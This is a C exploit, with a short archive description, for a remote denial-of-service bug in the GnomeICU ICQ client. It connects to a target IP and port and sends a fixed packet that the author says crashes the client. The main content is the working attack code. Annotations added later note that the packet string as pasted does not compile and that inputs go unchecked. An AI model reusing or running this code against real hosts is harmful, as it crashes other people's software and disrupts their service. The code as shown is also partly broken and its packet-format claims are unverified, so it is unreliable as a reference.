GnomeICU v0.96.1 remote dos exploit. Sends a message with uin=0000000 causing a seg fault. Tested on GnomeICU 0.95->0.96.1 on RH 7.0, Slackware 8.0.
6c7a971a62cffc000b5fbfe560a6c6266cee3054efb33e5fa8c904d551d9a46d
/* gnome.icu.crash - by insulted
oh god, this is so lame again... i found out this lil dos
on gnome icu while i was coding a small icq app... This is a
fairly simple bug: when a msg with uin 0000000 is sent,
the gnome icu client can't handle it and the applet simply
seg faults.
tested on GnomeICU 0.95->0.96.1 on RH 7.0, Slackware 8.0
mail: christian.milow@mail.be
*/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <unistd.h>
#include <arpa/inet.h>
/* Fixed packet bytes, sent verbatim by main() below.
 * As pasted here the literal runs across raw line breaks, which a C
 * compiler rejects (line continuations were presumably lost on the way
 * onto the page). Note that sizeof(icqmsg) as used in send() also counts
 * the implicit trailing NUL of the string literal. The header comment
 * says this is an ICQ message carrying uin 0000000; the byte layout is
 * not annotated here, so treat that as the author's claim. */
char icqmsg[]={"\x00\x00\x89\x11\x08\x04\x03\x00\xEE\x07
\x00\x00\x70\x8C\x08\x04\x01\x00\x04\x00
\x00\x00\x00\x00\xD4\x44\xDC\xEF\xD4\x44
\xDC\xEF\xA0\x0F\x00\x00\x04\x00\x00\x10
\x00\xF6\xFF\xFF\xFF"};
/* Entry point: connects over TCP to <ip>:<port> and writes icqmsg once.
 * Returns -1 on usage error or any failed socket call, 0 otherwise.
 * Review notes: argv[2] goes through atoi() and argv[1] through
 * inet_addr() with no validation of either result; the sockaddr_in is
 * not zero-initialised (sin_zero is left indeterminate); and the socket
 * is not closed on the error paths (harmless only because the process
 * exits immediately). */
int main(int argc, char *argv[])
{
int sock;
struct sockaddr_in slut;
if(argc<3)
{
printf("usage: %s <ip> <port>\n",argv[0]);
printf(" default port on gicu is 4000\n");
return -1;
}
/* once upon a sock ... */
if((sock = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0)
{
perror("socket");
return -1;
}
slut.sin_family = AF_INET;
/* atoi() returns 0 on garbage input; a port of 0 is passed on unchecked */
slut.sin_port = htons(atoi(argv[2]));
/* inet_addr() signals a bad dotted-quad with INADDR_NONE, which is not checked */
slut.sin_addr.s_addr=inet_addr(argv[1]);
/* sizeof(struct sockaddr) is used rather than sizeof slut; on the
 * platforms named in the header the two sizes coincide */
if(connect(sock,(struct sockaddr *)&slut,sizeof(struct sockaddr))<0)
{
perror("connect");
return -1;
}
/* &icqmsg is a pointer to the whole array; sizeof(icqmsg) includes the
 * string literal's terminating NUL, so one byte more than the escapes
 * spell out is written */
if(send(sock,&icqmsg,sizeof(icqmsg),0)<0)
{
perror("send");
return -1;
}
/* she lived happily ever after ... */
close(sock);
/* END - so quick, so done */
return 0;
}